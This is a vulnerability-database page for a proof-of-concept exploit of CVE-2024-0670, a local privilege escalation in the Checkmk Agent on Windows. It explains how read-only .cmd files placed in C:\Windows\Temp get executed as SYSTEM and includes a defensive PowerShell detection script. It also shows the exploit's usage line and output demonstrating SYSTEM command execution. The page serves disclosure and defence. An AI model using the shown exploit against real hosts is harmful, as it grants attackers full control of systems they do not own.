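Related vulnerability
Title: Checkmk security vulnerability (CVE-2024-0670)
Description: Checkmk is an editor. Checkmk contains a security vulnerability: a privilege escalation flaw that allows a local user to escalate privileges. Affected products and versions: Checkmk versions before 2.2.0p23, before 2.1.0p40, and before 2.0.0 (EOL).
Description
PoC for CVE-2024-0670
Introduction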
# [CVE-2024-0670](https://nvd.nist.gov/vuln/detail/CVE-2024-0670) PoC
This repository provides a **Proof of Concept (PoC)** exploit for the **[CVE-2024-0670](https://nvd.nist.gov/vuln/detail/CVE-2024-0670)** vulnerability, affecting the **CheckMK Agent** on Windows systems. The vulnerability occurs when the **CheckMK Agent** creates and executes temporary files in the `C:\Windows\Temp` directory. An attacker can abuse this behavior by pre-positioning malicious files in that directory with write protection. When the agent attempts to create a temporary file that already exists as read-only, it fails to overwrite it but still executes the existing file with `SYSTEM` privileges, enabling privilege escalation.
Advisory Reference: [SEC Consult - Local Privilege Escalation via writable files in Checkmk Agent](https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/)
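
For defenders, the pre-positioning described above leaves an artifact on disk: read-only `.cmd` files in `C:\Windows\Temp` owned by an unprivileged account. The script below is an added example, not part of this repository or of Checkmk; the trusted-owner SID list and the `$BulkThreshold` value are assumptions to adjust for your environment.

```powershell
# Added defensive check; not part of the PoC repository.
# Run from an elevated prompt: standard users cannot list C:\Windows\Temp.
[CmdletBinding()]
param(
    [string]$TempDir = 'C:\Windows\Temp',
    # Assumption: count at which the findings are reported as bulk pre-positioning.
    [int]$BulkThreshold = 50
)

# Owners treated as trusted (assumption), compared by SID so the check
# also works on localized Windows installs.
$trustedOwnerSids = @(
    'S-1-5-18',       # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',   # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller
)
$sidType = [System.Security.Principal.SecurityIdentifier]

$findings = @(
    Get-ChildItem -LiteralPath $TempDir -Filter '*.cmd' -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -eq '.cmd' -and $_.IsReadOnly } |
        ForEach-Object {
            # An unreadable ACL is reported rather than silently skipped.
            $sid = try {
                (Get-Acl -LiteralPath $_.FullName -ErrorAction Stop).GetOwner($sidType).Value
            } catch { 'unreadable' }
            [pscustomobject]@{
                Path     = $_.FullName
                OwnerSid = $sid
                Created  = $_.CreationTime
                Bytes    = $_.Length
            }
        } |
        Where-Object { $_.OwnerSid -notin $trustedOwnerSids }
)

if ($findings.Count -eq 0) {
    Write-Output "No read-only .cmd files with untrusted owners in $TempDir."
} else {
    $findings | Sort-Object Created | Format-Table -AutoSize
    if ($findings.Count -ge $BulkThreshold) {
        Write-Warning "$($findings.Count) read-only .cmd files with untrusted owners in $TempDir."
    }
}
```

A clean result only describes the directory at scan time; hosts still running an agent version listed as affected above remain exposed until they are updated.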
---
### :warning: DISCLAIMER
This project is intended **for educational, research, and authorized security testing purposes only**.
**Do not use this code on systems you do not own or have explicit permission to test.**
The author is **not responsible** for any damage or misuse.
---
### Usage
```
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
```
### Example
```
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer...
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
```
File snapshot
[4.0K] /data/pocs/e5dec4ce69165da0189a0ab2c6594b9041c5964c
├── [1.8K] CVE-2024-0670.ps1
└── [2.0K] README.md
1 directory, 2 files